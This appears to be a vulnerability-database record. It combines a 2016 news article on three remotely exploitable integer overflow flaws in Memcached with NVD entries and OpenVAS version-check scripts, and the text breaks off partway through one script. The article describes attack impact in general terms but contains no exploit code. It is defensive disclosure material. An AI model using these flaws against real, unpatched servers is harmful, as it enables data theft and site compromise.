Multiple Critical Remotely Exploitable Flaws Discovered in Memcached Caching System
2016-11-01T23:21:00
ID THN:0CB5E22FC1D91226BC56E430F1E31C62 Type thn Reporter Swati Khandelwal Modified 2016-11-02T10:21:37
Description
Hey Webmasters, are you using Memcached to boost the performance of your website?
Beware! It might be vulnerable to remote hackers.
Three critical Remote Code Execution vulnerabilities have been reported in Memcached by security researcher Aleksandar Nikolich at Cisco Talos Group that expose major websites, including Facebook, Twitter, YouTube, Reddit, to hackers.
Memcached is a fabulous piece of open-source distributed caching system that allows objects to be stored in memory. It has been designed to speed up dynamic web applications by reducing stress on the database that helps administrators to increase performance and scale web applications.
Memcached is widely used by thousands upon thousands of websites, including popular social networking sites such as Facebook, Flickr, Twitter, Reddit, YouTube, Github, and many more.
Nikolich says that he discovered multiple integer overflow bugs in Memcached that could be exploited to remotely run arbitrary code on the targeted system, thereby compromising the many websites that expose Memcache servers accessible over the Internet.
The vulnerabilities actually reside in_ "various Memcached functions that are used in inserting, appending, prepending, or modifying key-value data pairs."_
CVE-2016-8704: Memcached Server Append/Prepend Remote Code Execution Vulnerability
CVE-2016-8705: Memcached Server Update Remote Code Execution Vulnerability
CVE-2016-8706: Memcached Server SASL Authentication Remote Code Execution Vulnerability
Hackers Can Remotely Steal Sensitive Information
If exploited, the vulnerabilities could allow attackers to send repeat specifically-crafted Memcached commands to the targeted servers.
Moreover, the flaws could also be exploited to leak sensitive process information that can further be used to bypass standard exploitation mitigations, like ASLR (Address Space Layout Randomisation), making the attacks reliable and considerably "severe."
By default, Memcached service installed on your server is available to the world on TCP port 11211, so it has always been strongly recommended to limit its access within a trusted environment, behind the firewall.
So, if you have not yet updated your software to the latest release and Memcached service is publically accessible, an attacker can simply exploit these vulnerabilities to remotely steal sensitive information cached by the server without your knowledge.
What's even worse? These flaws could allow hackers to replace cached content with their malicious one in order to deface the website, serve phishing pages and malicious links to hijack victim's machine, placing hundreds of millions of online users at risk.
Patch your Memcached Server Now!
The integer overflow flaws in Memcached affect Memcached version 1.4.31 and earlier.
The researcher notified Memcached of the flaws and the company only took two days to build a patch on 31st October.
Memcached says the critical remote code execution flaws_ "are related to the binary protocol as well as SASL authentication of the binary protocol,"_ but has been fixed in the latest release.
Customers are advised to apply the patch even to Memcached deployments in "trusted" environments, as attackers with existing access could target vulnerable servers to move laterally within those networks.
{"id": "THN:0CB5E22FC1D91226BC56E430F1E31C62", "type": "thn", "bulletinFamily": "info", "title": "Multiple Critical Remotely Exploitable Flaws Discovered in Memcached Caching System", "description": "[](<https://4.bp.blogspot.com/-P9GZCIazWyk/WBm9Wwdr5TI/AAAAAAAAqEA/hvO6vZJgCNUH2gTpSvApbgAVz_gsB68lgCLcB/s1600/memcached-remote-code-execution-vulnerabilities.png>)\n\nHey Webmasters, are you using Memcached to boost the performance of your website? \n \nBeware! It might be vulnerable to remote hackers. \n \nThree critical Remote Code Execution vulnerabilities have been [reported](<http://blog.talosintel.com/2016/10/memcached-vulnerabilities.html>) in Memcached by security researcher Aleksandar Nikolich at Cisco Talos Group that expose major websites, including Facebook, Twitter, YouTube, Reddit, to hackers. \n \nMemcached is a fabulous piece of open-source distributed caching system that allows objects to be stored in memory. It has been designed to speed up dynamic web applications by reducing stress on the database that helps administrators to increase performance and scale web applications. \n \nMemcached is widely used by thousands upon thousands of websites, including popular social networking sites such as Facebook, Flickr, Twitter, Reddit, YouTube, Github, and many more. \n \nNikolich says that he discovered multiple integer overflow bugs in Memcached that could be exploited to remotely run arbitrary code on the targeted system, thereby compromising the many websites that expose Memcache servers accessible over the Internet. \n \nThe vulnerabilities actually reside in_ \"various Memcached functions that are used in inserting, appending, prepending, or modifying key-value data pairs.\"_ \n\n\n * [CVE-2016-8704](<http://www.talosintelligence.com/reports/TALOS-2016-0219/>): Memcached Server Append/Prepend Remote Code Execution Vulnerability\n * [CVE-2016-8705](<http://www.talosintelligence.com/reports/TALOS-2016-0220/>): Memcached Server Update Remote Code Execution Vulnerability\n * [CVE-2016-8706](<http://www.talosintelligence.com/reports/TALOS-2016-0221/>): Memcached Server SASL Authentication Remote Code Execution Vulnerability\n\n \n\n\n### Hackers Can Remotely Steal Sensitive Information\n\n \nIf exploited, the vulnerabilities could allow attackers to send repeat specifically-crafted Memcached commands to the targeted servers. \n \nMoreover, the flaws could also be exploited to leak sensitive process information that can further be used to bypass standard exploitation mitigations, like ASLR (Address Space Layout Randomisation), making the attacks reliable and considerably \"severe.\" \n \nBy default, Memcached service installed on your server is available to the world on TCP port 11211, so it has always been strongly recommended to limit its access within a trusted environment, behind the firewall. \n \nSo, if you have not yet updated your software to the latest release and Memcached service is publically accessible, an attacker can simply exploit these vulnerabilities to remotely steal sensitive information cached by the server without your knowledge. \n \n**What's even worse?** These flaws could allow hackers to replace cached content with their malicious one in order to deface the website, serve phishing pages and malicious links to hijack victim's machine, placing hundreds of millions of online users at risk. \n \n\n\n### Patch your Memcached Server Now!\n\n \nThe integer overflow flaws in Memcached affect Memcached version 1.4.31 and earlier. \n \nThe researcher notified Memcached of the flaws and the company only took two days to build a patch on 31st October. \n \nMemcached [says](<https://github.com/memcached/memcached/wiki/ReleaseNotes1433>) the critical remote code execution flaws_ \"are related to the binary protocol as well as SASL authentication of the binary protocol,\"_ but has been fixed in the latest release. \n \nCustomers are advised to apply the patch even to Memcached deployments in \"trusted\" environments, as attackers with existing access could target vulnerable servers to move laterally within those networks.\n", "published": "2016-11-01T23:21:00", "modified": "2016-11-02T10:21:37", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "href": "https://thehackernews.com/2016/11/memcached-hacking.html", "reporter": "Swati Khandelwal", "references": [], "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "lastseen": "2018-01-27T10:06:45", "viewCount": 13, "enchantments": {"score": {"value": 5.5, "vector": "NONE", "modified": "2018-01-27T10:06:45", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-8706", "CVE-2016-8704", "CVE-2016-8705"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220161086", "OPENVAS:1361412562310810158", "OPENVAS:1361412562310872102", "OPENVAS:1361412562310140042", "OPENVAS:1361412562311220191396", "OPENVAS:1361412562310810180", "OPENVAS:1361412562310703704", "OPENVAS:703704", "OPENVAS:1361412562310871721", "OPENVAS:1361412562310842939"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:139572"]}, {"type": "archlinux", "idList": ["ASA-201611-1"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-2819", "ELSA-2016-2820"]}, {"type": "gentoo", "idList": ["GLSA-201701-12"]}, {"type": "ubuntu", "idList": ["USN-3120-1"]}, {"type": "nessus", "idList": ["ALA_ALAS-2016-761.NASL", "UBUNTU_USN-3120-1.NASL", "FEDORA_2016-4DF986A71F.NASL", "FREEBSD_PKG_F4BF713F6AC74B76898047BF90C5419F.NASL", "REDHAT-RHSA-2016-2819.NASL", "ORACLELINUX_ELSA-2016-2819.NASL", "EULEROS_SA-2019-1396.NASL", "DEBIAN_DSA-3704.NASL", "OPENSUSE-2016-1313.NASL", "FEDORA_2016-0C4E822340.NASL"]}, {"type": "freebsd", "idList": ["F4BF713F-6AC7-4B76-8980-47BF90C5419F"]}, {"type": "redhat", "idList": ["RHSA-2016:2820", "RHSA-2017:0059", "RHSA-2016:2819"]}, {"type": "fedora", "idList": ["FEDORA:C0B6E60419A6", "FEDORA:8EEC5601CEEA", "FEDORA:8C07F604CD91", "FEDORA:9037C6068705", "FEDORA:ACF9D6101A4C"]}, {"type": "debian", "idList": ["DEBIAN:DLA-701-1:E0C8E", "DEBIAN:DSA-3704-1:B1F3F", "DEBIAN:DSA-4218-1:F15A6", "DEBIAN:DLA-1033-1:E6844"]}, {"type": "amazon", "idList": ["ALAS-2016-761"]}, {"type": "thn", "idList": ["THN:D62B44A1B8B3D803033457090AB49300"]}, {"type": "centos", "idList": ["CESA-2016:2820", "CESA-2016:2819"]}, {"type": "talosblog", "idList": ["TALOSBLOG:C9CDF0BBD65EE0553C843FD8CACCB478"]}, {"type": "suse", "idList": ["SUSE-SU-2018:0778-1", "SUSE-SU-2018:0807-1"]}, {"type": "talos", "idList": ["TALOS-2016-0221", "TALOS-2016-0220", "TALOS-2016-0219"]}], "modified": "2018-01-27T10:06:45", "rev": 2}, "vulnersScore": 5.5}}
{"cve": [{"lastseen": "2020-12-09T20:07:43", "description": "An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.", "edition": 5, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-06T21:59:00", "title": "CVE-2016-8706", "type": "cve", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-8706"], "modified": "2017-07-28T01:29:00", "cpe": ["cpe:/a:memcached:memcached:1.4.31"], "id": "CVE-2016-8706", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8706", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:memcached:memcached:1.4.31:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:43", "description": "Multiple integer overflows in process_bin_update function in Memcached, which is responsible for processing multiple commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-06T21:59:00", "title": "CVE-2016-8705", "type": "cve", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-8705"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/a:memcached:memcached:1.4.31"], "id": "CVE-2016-8705", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8705", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:memcached:memcached:1.4.31:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:43", "description": "An integer overflow in the process_bin_append_prepend function in Memcached, which is responsible for processing multiple commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-06T21:59:00", "title": "CVE-2016-8704", "type": "cve", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-8704"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/a:memcached:memcached:1.4.31"], "id": "CVE-2016-8704", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8704", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:memcached:memcached:1.4.31:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-24T12:55:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "Aleksandar Nikolic of Cisco Talos discovered several integer overflow\nvulnerabilities in memcached, a high-performance memory object caching\nsystem. A remote attacker can take advantage of these flaws to cause a\ndenial of service (daemon crash), or potentially to execute arbitrary\ncode.", "modified": "2017-07-07T00:00:00", "published": "2016-11-03T00:00:00", "id": "OPENVAS:703704", "href": "http://plugins.openvas.org/nasl.php?oid=703704", "type": "openvas", "title": "Debian Security Advisory DSA 3704-1 (memcached - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3704.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3704-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703704);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_name(\"Debian Security Advisory DSA 3704-1 (memcached - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-11-03 00:00:00 +0100 (Thu, 03 Nov 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3704.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"memcached on Debian Linux\");\n script_tag(name: \"insight\", value: \"Danga Interactive developed memcached to enhance the speed of LiveJournal.com,\na site which was already doing 20 million+ dynamic page views per day for 1\nmillion users with a bunch of webservers and a bunch of database servers.\nmemcached dropped the database load to almost nothing, yielding faster page\nload times for users, better resource utilization, and faster access to the\ndatabases on a memcache miss.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), these problems have been fixed in\nversion 1.4.21-1.1+deb8u1.\n\nWe recommend that you upgrade your memcached packages.\");\n script_tag(name: \"summary\", value: \"Aleksandar Nikolic of Cisco Talos discovered several integer overflow\nvulnerabilities in memcached, a high-performance memory object caching\nsystem. A remote attacker can take advantage of these flaws to cause a\ndenial of service (daemon crash), or potentially to execute arbitrary\ncode.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"memcached\", ver:\"1.4.21-1.1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:35:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "Aleksandar Nikolic of Cisco Talos discovered several integer overflow\nvulnerabilities in memcached, a high-performance memory object caching\nsystem. A remote attacker can take advantage of these flaws to cause a\ndenial of service (daemon crash), or potentially to execute arbitrary\ncode.", "modified": "2019-03-18T00:00:00", "published": "2016-11-03T00:00:00", "id": "OPENVAS:1361412562310703704", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703704", "type": "openvas", "title": "Debian Security Advisory DSA 3704-1 (memcached - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3704.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3704-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703704\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_name(\"Debian Security Advisory DSA 3704-1 (memcached - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-03 00:00:00 +0100 (Thu, 03 Nov 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3704.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"memcached on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), these problems have been fixed in\nversion 1.4.21-1.1+deb8u1.\n\nWe recommend that you upgrade your memcached packages.\");\n script_tag(name:\"summary\", value:\"Aleksandar Nikolic of Cisco Talos discovered several integer overflow\nvulnerabilities in memcached, a high-performance memory object caching\nsystem. A remote attacker can take advantage of these flaws to cause a\ndenial of service (daemon crash), or potentially to execute arbitrary\ncode.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"memcached\", ver:\"1.4.21-1.1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:36:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220161086", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220161086", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for memcached (EulerOS-SA-2016-1086)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2016.1086\");\n script_version(\"2020-01-23T10:42:35+0000\");\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:42:35 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:42:35 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for memcached (EulerOS-SA-2016-1086)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2016-1086\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1086\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'memcached' package(s) announced via the EulerOS-SA-2016-1086 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Two integer overflow flaws, leading to heap-based buffer overflows, were found in the memcached binary protocol. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code. (CVE-2016-8704, CVE-2016-8705)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in memcached's parsing of SASL authentication messages. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code.(CVE-2016-8706)\");\n\n script_tag(name:\"affected\", value:\"'memcached' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"memcached\", rpm:\"memcached~1.4.15~9.h1\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:34:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191396", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191396", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for memcached (EulerOS-SA-2019-1396)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1396\");\n script_version(\"2020-01-23T11:41:51+0000\");\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:41:51 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:41:51 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for memcached (EulerOS-SA-2019-1396)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1396\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1396\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'memcached' package(s) announced via the EulerOS-SA-2019-1396 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An integer overflow flaw, leading to a heap-based buffer overflow, was found in the memcached binary protocol. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code.(CVE-2016-8704)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the memcached binary protocol. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code.(CVE-2016-8705)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in memcached's parsing of SASL authentication messages. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code.(CVE-2016-8706)\");\n\n script_tag(name:\"affected\", value:\"'memcached' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n 